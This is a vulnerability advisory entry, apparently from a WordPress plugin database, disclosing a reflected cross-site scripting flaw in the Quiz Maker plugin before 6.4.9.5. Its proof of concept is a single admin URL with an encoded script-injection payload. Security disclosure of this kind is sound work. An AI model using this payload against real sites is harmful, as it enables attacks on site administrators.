WordPress Plugin Vulnerabilities
Quiz Maker < 6.4.9.5 - Reflected Cross-Site Scripting
Description
The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting
Proof of Concept
Visit the following URL: https://example.com/wp-admin/admin.php?page=quiz-maker-questions&fake%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E=something
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Alex Sanford
Submitter
Alex Sanford
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-11-30 (about 5 months ago)
Added
2023-11-30 (about 5 months ago)
Last Updated
2023-11-30 (about 5 months ago)